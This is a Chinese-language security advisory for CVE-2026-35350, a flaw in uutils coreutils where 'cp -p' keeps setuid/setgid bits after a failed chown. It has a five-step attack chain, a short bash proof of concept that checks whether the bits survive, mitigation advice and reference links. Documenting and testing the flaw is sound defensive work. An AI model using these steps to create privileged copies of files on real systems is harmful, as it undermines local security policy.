CVE-2026-35350 CVSS 6.6 中危

CVE-2026-35350 uutils coreutils cp权限提升漏洞

披露日期: 2026-04-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35350

漏洞类型

权限提升

CVSS评分

6.6 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

uutils coreutils

漏洞概述

uutils coreutils 的 cp 工具在处理文件权限时存在逻辑漏洞。在使用 -p 参数尝试保留文件属性时，若更改文件所有者的操作失败，该工具仍会错误地保留源文件的 setuid 和 setgid 权限位。这种行为可能导致用户拥有的文件意外获得执行特权，从而违反本地安全策略，造成潜在的安全风险。

技术细节

该漏洞源于 uutils coreutils 中 `cp` 命令的权限处理逻辑与 GNU coreutils 不一致。当使用 `cp -p` 命令复制文件时，程序会尝试保留源文件的所有者和模式位。在标准行为中（如 GNU cp），如果当前用户没有权限更改文件所有者（即 chown 操作失败），为了防止权限提升，应当清除文件的 setuid 和 setgid 位。然而，uutils 的实现在 chown 失败的情况下，仍然强制应用源文件的模式位。这意味着，如果普通用户复制了一个属于 root 且设置了 setuid 位的文件，虽然所有权更改会被拒绝，但生成的文件仍将保留 setuid 位并由该用户所有。尽管这通常不会直接提升至 root 权限（除非针对特定用户），但它创建了不符合安全规范的特权可执行文件，破坏了系统的安全模型，可能被用于绕过某些基于文件属性的检测或与其他漏洞组合利用。

攻击链分析

STEP 1

发现阶段

攻击者发现目标系统使用的是存在漏洞的 uutils coreutils 版本，而非 GNU coreutils。

STEP 2

准备阶段

攻击者定位系统中具有 setuid 或 setgid 位的敏感可执行文件，这些文件通常属于高权限用户（如 root）。

STEP 3

执行阶段

攻击者以低权限用户身份运行 `cp -p` 命令，尝试将敏感文件复制到攻击者可控的目录。

STEP 4

权限保留

由于 uutils cp 的逻辑缺陷，虽然 chown 失败（无法将文件所有者改为 root），但 setuid/setgid 位被错误地保留在副本文件中。

STEP 5

利用阶段

攻击者获得了一个带有特权位的可执行文件副本，尽管它归攻击者所有，但这违反了安全策略，可能导致后续的权限提升或绕过安全检查。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-35350: uutils coreutils cp setuid retention
# Preparation: Create a setuid root file as root
echo "echo 'If this prints, exploit worked'" > /tmp/target_file
chmod 4755 /tmp/target_file
chown root:root /tmp/target_file

# Exploitation: Run as a non-privileged user (e.g., 'nobody' or regular user)
# The user attempts to copy the file preserving permissions
cp -p /tmp/target_file ~/owned_exploit

# Verification
# Check the permissions of the copied file
# Expected secure behavior: permissions should be 0755 (setuid bit cleared)
# Vulnerable behavior: permissions are 4755 (setuid bit retained), owned by user
ls -l ~/owned_exploit

# Cleanup (run as root)
rm /tmp/target_file

影响范围

uutils coreutils (修复前版本)

防御指南

临时缓解措施

建议用户暂时使用 GNU coreutils 中的 cp 命令替代 uutils 版本。系统管理员应审查系统中的用户文件权限，查找并移除非预期的 setuid 或 setgid 文件，以防止安全策略被绕过。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-35350
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-35350
3 Details https://www.cvedetails.com/cve/CVE-2026-35350/
4 VulDB https://vuldb.com/cve/CVE-2026-35350
5 Link https://github.com/uutils/coreutils/issues/9750
6 Link https://github.com/uutils/coreutils/issues/9750

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表